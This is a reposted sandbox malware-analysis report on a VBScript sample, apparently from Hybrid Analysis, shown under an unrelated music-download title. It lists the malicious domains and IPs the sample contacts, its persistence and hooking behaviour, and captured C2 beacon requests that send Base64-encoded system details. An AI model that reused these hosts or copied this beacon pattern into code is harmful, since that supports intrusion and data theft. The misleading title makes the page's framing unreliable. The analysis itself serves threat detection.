
Eviscerator Slaves To A Discordant System Download

Incident Response

Risk Assessment

Network Behavior
Contacts 5 domains and 5 hosts.

MITRE ATT&CK™ Techniques Detection

This report has 3 indicators that were mapped to 6 attack techniques and 5 tactics.

Indicators

Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.

  • External Systems
    • Detected Suricata Alert
      details
      Signature details suppressed, as ETPro rules matched and display has been disabled. Please see the Emerging Threats section for more information.
      source
      Suricata Alerts
      relevance
      10/10
    • Sample was identified as malicious by at least one Antivirus engine
      details
      3/59 Antivirus vendors marked sample as malicious (5% detection rate)
      source
      External System
      relevance
      8/10
  • Network Related
    • Malicious artifacts seen in the context of a contacted host
      details
      Found malicious artifacts related to "37.9.175.9": ...


      source
      Network Traffic
      relevance
      10/10
  • Hiding 1 Malicious Indicators
    • All indicators are available only in the private webservice or standalone version
  • Anti-Reverse Engineering
    • Possibly checks for known debuggers/analysis tools
      details
      source
      String
      relevance
      2/10
  • External Systems
    • Found an IP/URL artifact that was identified as malicious by at least one reputation engine
      details
      3/76 reputation engines marked "http://www.kitaair.com" as malicious (3% detection rate)
      2/76 reputation engines marked "http://gdpronline.sk" as malicious (2% detection rate)
      3/76 reputation engines marked "http://kitaair.com" as malicious (3% detection rate)
      2/76 reputation engines marked "http://hotdsk.com" as malicious (2% detection rate)
      source
      External System
      relevance
      10/10
  • Installation/Persistence
    • Executes a Visual Basic script
      details
      Process "wscript.exe" with commandline "C:\MSG_111188.vbs"
      source
      Monitored Target
      relevance
      10/10
    • Loads the task scheduler COM API
      details
      "wscript.exe" loaded module "%WINDIR%\System32\taskschd.dll" at 02670000
      "wscript.exe" loaded module "%WINDIR%\System32\taskschd.dll" at FA850000
      source
      Loaded Module
      relevance
      5/10
      ATT&CK ID
T1168
  • Network Related
    • Sends traffic on typical HTTP outbound port, but without HTTP header
      details
      TCP traffic to 173.249.60.219 on port 80 is sent without HTTP header
      TCP traffic to 46.16.91.179 on port 80 is sent without HTTP header
      TCP traffic to 46.16.91.179 on port 443 is sent without HTTP header
      TCP traffic to 37.9.175.9 on port 80 is sent without HTTP header
      TCP traffic to 77.104.140.85 on port 80 is sent without HTTP header
      source
      Network Traffic
      relevance
      5/10
  • General
    • Contacts domains
      details
      "hotdsk.com"
      "kitaair.com"
      "gdpronline.sk"
      "a.8xcornwall.com"
      "www.kitaair.com"
      source
      Network Traffic
      relevance
      1/10
    • Contacts server
      details
      "173.249.60.219:80"
      "46.16.91.179:80"
      "46.16.91.179:443"
      "37.9.175.9:80"
      "77.104.140.85:80"
      source
      Network Traffic
      relevance
      1/10
    • Loads the .NET runtime environment
      details
      "wscript.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_64\mscorlib\0478aed7fc25ae268474c704fd2a3e0f\mscorlib.ni.dll" at EB430000
      source
      Loaded Module
    • Overview of unique CLSIDs touched in registry
      details
      "wscript.exe" touched "VB Script Language" (Path: "HKCU\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}")
      "wscript.exe" touched "Constructor that allows hosts better control creating scriptlets" (Path: "HKCU\CLSID\{06290BD1-48AA-11D2-8432-006008C3FBFC}")
      "wscript.exe" touched "XML DOM Document 3.0" (Path: "HKCR\SOFTWARE\CLASSES\CLSID\{F5078F32-C551-11D3-89B9-0000F81FE221}")
      "wscript.exe" touched "ADODB.Stream" (Path: "HKCU\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\TREATAS")
      "wscript.exe" touched "Multi Language Support" (Path: "HKCU\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}\TREATAS")
      "wscript.exe" touched "Windows Script Host Shell Object" (Path: "HKCU\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\TREATAS")
      "wscript.exe" touched "Server XML HTTP 6.0" (Path: "HKCU\CLSID\{88D96A0B-F192-11D4-A65F-0040963251E5}\TREATAS")
      "wscript.exe" touched "WinHttpRequest Component version 5.1" (Path: "HKCU\CLSID\{2087C2F4-2CEF-4953-A8AB-66779B670495}\TREATAS")
      "wscript.exe" touched "Wbem Scripting Object Path" (Path: "HKCU\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\TREATAS")
      "wscript.exe" touched "WBEM Locator" (Path: "HKCU\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\TREATAS")
      "wscript.exe" touched "WbemDefaultPathParser" (Path: "HKCU\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\TREATAS")
      "wscript.exe" touched "Windows Management and Instrumentation" (Path: "HKCU\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\TREATAS")
      "wscript.exe" touched "PSFactoryBuffer" (Path: "HKCU\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\TREATAS")
      "wscript.exe" touched "Microsoft WBEM (non)Standard Marshaling for IWbemServices" (Path: "HKCU\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\TREATAS")
      "wscript.exe" touched "Microsoft WBEM (non)Standard Marshaling for IEnumWbemClassObject" (Path: "HKCU\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\TREATAS")
      "wscript.exe" touched "System.Text.UnicodeEncoding" (Path: "HKCU\CLSID\{A0F5F5DC-337B-38D7-B1A3-FB1B95666BBF}\TREATAS")
      "wscript.exe" touched "XML DOM Document" (Path: "HKCU\CLSID\{2933BF90-7B36-11D2-B20E-00C04F983E60}\TREATAS")
      "wscript.exe" touched "Microsoft OLE DB Error Collection Service" (Path: "HKCU\CLSID\{C8B522CF-5CF3-11CE-ADE5-00AA0044773D}\TREATAS")
      "wscript.exe" touched "ADO 6.0" (Path: "HKCU\CLSID\{0000051A-0000-0010-8000-00AA006D2EA4}\EXTENDEDERRORS")
      "wscript.exe" touched "ADODB Error Lookup Service" (Path: "HKCU\CLSID\{00000542-0000-0010-8000-00AA006D2EA4}\TREATAS")
      source
      Registry Access
      relevance
      3/10
  • Installation/Persistence
    • Touches files in the Windows directory
      details
      "wscript.exe" touched file "%WINDIR%\System32\wscript.exe"
      "wscript.exe" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
      "wscript.exe" touched file "C:\Windows\System32\en-US\KernelBase.dll.mui"
      "wscript.exe" touched file "C:\Windows\System32\msxml3r.dll"
      "wscript.exe" touched file "C:\Windows\System32\wshom.ocx"
      "wscript.exe" touched file "C:\Windows\System32\msxml6r.dll"
      "wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\clr.dll"
      "wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorwks.dll"
      "wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll"
      "wscript.exe" touched file "C:\Windows\System32\WScript.exe.config"
      "wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\machine.config"
      "wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config"
      "wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch"
      "wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config"
      "wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch"
      source
      API Call
      relevance
      7/10
  • Network Related
    • Found potential URL in binary/memory
      details
      Heuristic match: "hotdsk.com"
      Heuristic match: "GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      Accept-Language: en-us
      User-Agent: Prada
      Host: hotdsk.com"
      Heuristic match: "kitaair.com"
      Heuristic match: "GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      Accept-Language: en-us
      User-Agent: Prada
      Host: kitaair.com"
      Heuristic match: "gdpronline.sk"
      Heuristic match: "GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      Accept-Language: en-us
      User-Agent: Prada
      Host: gdpronline.sk"
      Heuristic match: "a.8xcornwall.com"
      Heuristic match: "GET /12891239.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      Accept-Language: en-us
      User-Agent: Prada
      Host: a.8xcornwall.com"
      Pattern match: "www.kitaair.com"
      source
      String
      relevance
      10/10
    • HTTP request contains Base64 encoded artifacts
      details
      "Microsoft Windows 7 Professional "
      source
      Network Traffic
      relevance
      7/10
      ATT&CK ID
T1132
  • Spyware/Information Retrieval
    • Found a reference to a known community page
      details
      "ss generalship eloign west-facing Kreiner abdicating unsummered preauthorize rehoning ichorrhemia twittery Esta Redmon russet-green rituality reastonish cryptorrhetic illatives refacilitate consulter nasiform lithotomical Iey decivilize condemnations choicely coynye chador paleocrystallic TUNIS 'Cissus white-dough unneedfulness diskography nepionic embreathe rummagers venogram corporationer N.C. intersetting pulpit jef gluemaking atimon anagrammatist vividnesses de-emphasize uncoking Teach sacra fleetest dust-soiled factuality choledochotomies rodlike redocked Cetraria communistic galleriies insuavity toppling ditheism ticket-printing legalistic leafhoppers lascivious porthouse copernicans Hydrophyllaceae epaulet quintette epidermose photoflash zoomed darr megacycles uncensoriousness supernuity Vespa tobogganer alodiary cuspids aggregato- presystematic blathers thickening sawmill microcodes kirn counternaiant pretabulated outtrick emboltement piedmontal rupicoline hemiramph rememberability cawney Tharsis Elec" (Indicator: "twitter")
      source
      String
      relevance
      7/10
  • Unusual Characteristics
    • Installs hooks/patches the running process
      details
      "wscript.exe" wrote bytes "40130000" to virtual address "0xFC848478" (part of module "SSPICLI.DLL")
      "wscript.exe" wrote bytes "00100000" to virtual address "0xFC8485A4" (part of module "SSPICLI.DLL")
      "wscript.exe" wrote bytes "654c8b1c25a0150000" to virtual address "0xF28B7403" (part of module "MSCORWKS.DLL")
      "wscript.exe" wrote bytes "654c8b1c25a0150000" to virtual address "0xF28B755E" (part of module "MSCORWKS.DLL")
      "wscript.exe" wrote bytes "654c8b1c25a0150000" to virtual address "0xF28B7480" (part of module "MSCORWKS.DLL")
      "wscript.exe" wrote bytes "00100000" to virtual address "0xFC848468" (part of module "SSPICLI.DLL")
      "wscript.exe" wrote bytes "654c8b1c25a0150000" to virtual address "0xF28B77AA" (part of module "MSCORWKS.DLL")
      "wscript.exe" wrote bytes "40130000" to virtual address "0xFC848538" (part of module "SSPICLI.DLL")
      "wscript.exe" wrote bytes "00100000" to virtual address "0xFD141748" (part of module "WS2_32.DLL")
      "wscript.exe" wrote bytes "65488b0425a0150000" to virtual address "0xF28B7A25" (part of module "MSCORWKS.DLL")
      "wscript.exe" wrote bytes "65488b0425a0150000" to virtual address "0xF28B7A60" (part of module "MSCORWKS.DLL")
      "wscript.exe" wrote bytes "48b86013fef3fe070000ffe0" to virtual address "0xFC831340" (part of module "SSPICLI.DLL")
      "wscript.exe" wrote bytes "401383fcfe070000" to virtual address "0xFC84FE48" (part of module "SSPICLI.DLL")
      "wscript.exe" wrote bytes "eb11c366669066669066669066669066669090" to virtual address "0xF28B5BC0" (part of module "MSCORWKS.DLL")
      "wscript.exe" wrote bytes "001083fcfe070000" to virtual address "0xFC84FB50" (part of module "SSPICLI.DLL")
      "wscript.exe" wrote bytes "401383fcfe070000" to virtual address "0xFC84FB10" (part of module "SSPICLI.DLL")
      "wscript.exe" wrote bytes "654c8b1c25a0150000" to virtual address "0xF28B760D" (part of module "MSCORWKS.DLL")
      "wscript.exe" wrote bytes "48b81016fef3fe070000ffe0" to virtual address "0xFC831000" (part of module "SSPICLI.DLL")
      "wscript.exe" wrote bytes "669065488b0425a0150000c366669066669090" to virtual address "0xF28B5B40" (part of module "MSCORWKS.DLL")
      "wscript.exe" wrote bytes "654c8b1c25a0150000" to virtual address "0xF28B75B3" (part of module "MSCORWKS.DLL")
      source
      Hook Detection
      relevance
      10/10
      ATT&CK ID
T1179

File Details

All Details:

MSG_111188.vbs

Filename
MSG_111188.vbs
Size
957KiB (979524 bytes)
Type
script vbs
Description
ASCII text, with very long lines
Architecture
WINDOWS
SHA256
5544009fff7f6facae80efa26d123e24a021c0bddeeda8efdee80e8d288819b2

Hybrid Analysis

Analysed 1 process in total.

  • wscript.exe "C:\MSG_111188.vbs" (PID: 3160)

Network Analysis

DNS Requests

HTTP Traffic

Suricata Alerts

ET rules applied using Suricata. ETPro rule matches (4 total) are hidden and available in the private webservice or standalone version.

Extracted Files

No significant files were extracted.

Notifications

  • Although all strings were processed, some are hidden from the report in order to reduce the overall size
  • Enforcing malicious verdict, as a reliable source indicates high confidence
  • Network whitenoise filtering (Process) was applied
  • Not all Falcon MalQuery lookups completed in time
  • Not all sources for indicator ID "api-55" are available in the report
  • Not all sources for indicator ID "hooks-8" are available in the report
  • Not all sources for indicator ID "registry-72" are available in the report

Source: https://www.hybrid-analysis.com/sample/5544009fff7f6facae80efa26d123e24a021c0bddeeda8efdee80e8d288819b2/5e7d1c3c9d78e538b401e802

Posted by: oscarprefontainee0193133.blogspot.com
